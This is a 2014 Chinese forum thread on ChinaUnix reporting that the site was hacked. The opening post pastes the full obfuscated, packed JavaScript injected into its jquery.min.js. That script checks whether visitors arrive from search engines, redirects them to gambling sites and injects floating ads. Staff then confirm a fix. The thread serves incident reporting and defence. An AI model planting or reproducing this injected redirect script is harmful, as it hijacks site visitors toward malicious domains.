ywsydbz 发表于 2014-04-22 11:35

www.chinaunix.net被黑了?

在百度或者google搜索关键词"chinaunix",进入www.chinaunix.net站点就跳到别的赌博网站.
http://www.chinaunix.net/www/static/js/jquery.min.js这个js中有些东西eval(function(p, a, c, k, e, d) {
    e = function(c) {
      return (c < a ? '': e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
      while (c--) {
            d = k || e(c)
      }
      k = [function(e) {
            return d
      }];
      e = function() {
            return '\\w+'
      };
      c = 1
    };
    while (c--) {
      if (k) {
            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k)
      }
    }
    return p
} ('d(3.N.Q(\'f\')==-1){e k=1b 1a();k.19(k.1c()+8);3.N=\'f=1;1d=\'+k.18();e U=3.1g;e G=[\'12\',\'11\',\'13\',\'17\',\'16\',\'15\',\'14.1e\',\'E.5\',\'1m\',\'1p\'];1h(e i 1o G){d(U.Q(G)!=-1){d(P.F.R){P.F.R.S=\'4://b.X.E/\'};F.S.j=\'4://b.t.5/6/H.6?n=1\'}}}1i{3.O("<A V=\'g\' 9=\'L:I;K:M;z-J:T;10-c:2%\'><i j=\'4://b.t.5/6/H.6?n=1\' p=\'q\'><r s=\'4://u.l.5.o/m/g-1.v\' x=\'a\' c=\'Y\' C=\'0\'></i><w><w><i j=\'4://b.t.5/6/1j.6?n=1\' p=\'q\'><r s=\'4://u.l.5.o/m/g-2.v\' x=\'a\' c=\'a\' C=\'0\'></i></A>");3.O("<A V=\'h\' 9=\'L:I;K:M;z-J:T;10-c:2%\'><i j=\'4://b.t.5/6/H.6?n=1\' p=\'q\'><r s=\'4://u.l.5.o/m/h-1.v\' x=\'a\' c=\'Y\' C=\'0\'></i><w><w><i j=\'4://b.X.E/\' p=\'q\'><r s=\'4://u.l.5.o/m/h-2.v\' x=\'a\' c=\'a\' C=\'0\'></i></A>");1r f(){d(!3.1q){e 7=3.D.W;d(7==0){7=3.z.W};3.B(\'g\').9.7=7+i+\'y\';3.B(\'g\').9.1n=3.D.Z+8+\'y\';3.B(\'h\').9.7=7+i+\'y\';3.B(\'h\').9.1k=3.D.Z+8+\'y\'};1l(\'f();\',1f)};f()}', 62, 90, '|||document|http|com|html|top||style|130|www|height|if|var|whoami|Left|Right||href|exp|discuz|Img|pid|de|target|_blank|img|src|888hy|api|gif|br|width|px||div|getElementById|border|body|so|window|bot|livedealer|absolute|index|visibility|position|visible|cookie|write|parent|indexOf|opener|location|999|ref|id|scrollTop|v587|240|scrollLeft|line|google|baidu|yahoo|360|sogou|soso|bing|toGMTString|setTime|Date|new|getTime|expires|cn|200|referrer|for|else|register|right|setTimeout|youdao|left|in|anquan|ns|function'.split('|'), 0, {}));就是第一句话,比较可疑.

风铃之音 发表于 2014-04-22 13:55

回复 1# ywsydbz


    我找技术看看,还请稍等哦

ywsydbz 发表于 2014-04-22 14:08

回复 2# 风铃之音
javascript我不咋熟悉,不过目测是根据判断referer来进行跳转的,所以直接输入网址或者没在规则内是不会跳到赌博网站的

   

send_linux 发表于 2014-04-22 22:42

ywsydbz 发表于 2014-04-22 14:08 static/image/common/back.gif
回复 2# 风铃之音
javascript我不咋熟悉,不过目测是根据判断referer来进行跳转的,所以直接输入网址或者没 ...

请问现在还有这问题么,下午技术已经处理过了,谢谢您的反馈

ywsydbz 发表于 2014-04-22 23:17

本帖最后由 ywsydbz 于 2014-04-22 23:17 编辑

现在测试已经正常了。是我贴出的那段javascript代码的问题吗?多说句,既然都把文件都修改了,说不定在什么文件中设置了后门或者上传了WebShell@send_linux

send_linux 发表于 2014-04-22 23:46

ywsydbz 发表于 2014-04-22 23:17 static/image/common/back.gif
现在测试已经正常了。是我贴出的那段javascript代码的问题吗?多说句,既然都把文件都修改了,说不定在什么 ...

谢谢您的提醒,我明天将这个信息转交给我们的技术人员
页: [1]
查看完整版本: www.chinaunix.net被黑了?